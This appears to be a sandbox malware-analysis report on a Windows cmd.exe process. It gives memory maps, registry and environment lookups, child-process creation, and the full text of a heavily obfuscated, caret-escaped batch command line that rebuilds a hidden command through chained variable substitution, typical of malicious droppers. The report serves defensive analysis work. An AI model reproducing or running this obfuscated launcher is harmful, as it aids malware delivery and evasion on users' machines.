msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7feffc50000 0x7feffd7cfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd3fff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory rw True False False -
Process #7: cmd.exe
205 0
»
Information Value
ID #7
File Name c:\windows\system32\cmd.exe
Command Line Cmd , ; ; ; pPuxarv/VCsv40blbkn , cw8f/r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )&&( , ( , (^s^e^t ^ ^ ^;^]=^!^'^}^_^-^:^j^U=^D^!) ) , )&( ; (^s^e^T ^ ^ ^`^\^+=^!^;^]^:^,^=^c^!) ; ; )&&( , ( , (S^e^T ^_^@^.^-=^!^`^\^+:^i^y^=^8^!) , , ) , , )&(^S^e^t ^ ^ ^ ^$^'=^
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:24
OS Process Information
»
Information Value
PID 0xb04
Parent PID 0xac0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B08
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory rw True False False -
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory r True False False -
locale.nls 0x00150000 0x001b6fff Memory Mapped File r False False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c6fff Pagefile Backed Memory r True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory rw True False False -
private_0x00000000001e0000 0x001e0000 0x002dffff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory rw True False False -
pagefile_0x00000000003e0000 0x003e0000 0x00567fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000570000 0x00570000 0x006f0fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000700000 0x00700000 0x01afffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001b00000 0x01b00000 0x01b01fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000001b10000 0x01b10000 0x01e52fff Pagefile Backed Memory r True False False -
private_0x0000000001e60000 0x01e60000 0x01e60fff Private Memory rw True False False -
private_0x0000000001e70000 0x01e70000 0x01e70fff Private Memory rw True False False -
private_0x0000000001e80000 0x01e80000 0x01f7ffff Private Memory rw True False False -
private_0x0000000001f80000 0x01f80000 0x0217ffff Private Memory rw True False False -
sortdefault.nls 0x02180000 0x0244efff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (54)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 9
Fn
Open STD_OUTPUT_HANDLE - True 32
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Write STD_OUTPUT_HANDLE size = 2 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 26 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 1 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 4 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 13 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 3 True 3
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (3)
»
Operation Process Additional Information Success Count Logfile
Create cmd.exe - True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xb3c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xb44, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:14 (UTC) True 1
Fn
Get Time type = Ticks, time = 139917 True 1
Fn
Environment (119)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Fn
Get Environment String name = PROMPT, result_out = $P$G True 2
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = ^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^ False 1
Fn
Get Environment String name = ^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^ False 1
Fn
Get Environment String name = ^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^ False 1
Fn
Get Environment String name = ^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^ False 1
Fn
Get Environment String name = ^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^ False 1
Fn
Get Environment String name = ^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^ False 1
Fn
Get Environment String name = ^R^en^6^w^L^P^jy^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^ False 1
Fn
Get Environment String name = R^en6w^L^P^j^y^{^7^y^jU^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^ False 1
Fn
Get Environment String name = ^R^en^6^w^L^P^j^y^{^7^y^j^U6^ False 1
Fn
Get Environment String name = ^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^ False 1
Fn
Get Environment String name = .^Y^.^Y^6^j^U^e/`^6^K^w^L^,^ False 1
Fn
Get Environment String name = ^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^ False 1
Fn
Get Environment String name = ^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^ False 1
Fn
Get Environment String name = ^w^L^]^6^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^ False 1
Fn
Get Environment String name = ^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^ False 1
Fn
Get Environment String name = e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^ False 1
Fn
Get Environment String name = ^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^ False 1
Fn
Get Environment String name = ^=^T!)&& (, ; , ;, ( , ; , (^S^e^T ^ ^ ^ ^}^\=^!^[^$^#^?^ False 1
Fn
Get Environment String name = ^!) , )&& ( , (^S^e^t ^ ^ ^*^}=^!^*^.^@^ False 1
Fn
Get Environment String name = ^g; ; , ^iN , ( ,'; ; ^^ft^^Y^^p^^e ;; , ^|, , ^^f^^iN^^d^^S^^t^^r ;^^c^^m '; ,) , ; ^d^o, , ;; ; (^e^c^h^O , False 1
Fn
Get Environment String name = ^*^[^-^, False 1
Fn
Get Environment String name = | False 1
Fn
Get Environment String name = +~}{, result_out = eo28PGC7y.Y.Yeo2vTd]F3pbf6K'.Y1.Y@eo2h8PZ7y8P3pTde37{jUnPjy+@eo2%zwLhwLTd3pe37{jUn#Pjy+2Xb2).Y112eo22+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3QeACh8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Keo22+2eo28Pm3QeAC3p`2+2qF3pbfN6m8P.YAC67jh`eo2GC7y8Pm'jU]62+242+2Zn.AC67[2+2F3pbfbfk7yuuQe37eo22+26KF3p].Yjh`eo2GC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3QeAC7yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371AC62+272+2%zwLhGC7yGC7yk7yeo28 ,.,.Zm6.2+28Peo24ax'Zm.3QeACX2+27',X2+2m,.AC ,.F3pjUn,.2+2.6GC7y4axuQe7yeo2K_X'2+2k7yn.AC672+2))[2+2F3pbfbfk7yuuQe2+2mQe6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3QeAC2+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQe7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQe2+2GC7y2+2GC7y6KF3pbfbfk7yuuQe37eo2'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQe76xd2+2F3pbf2+2bfk7yuuQe_2+2)[F3pbfbfk7yuuQemQe2+2{F3pbfbfk7yuuQe2+2_:H4axiy+F3pbfbfk7yuuQe7Pjy6K1{m6GC7y%zwLhPjy8 8 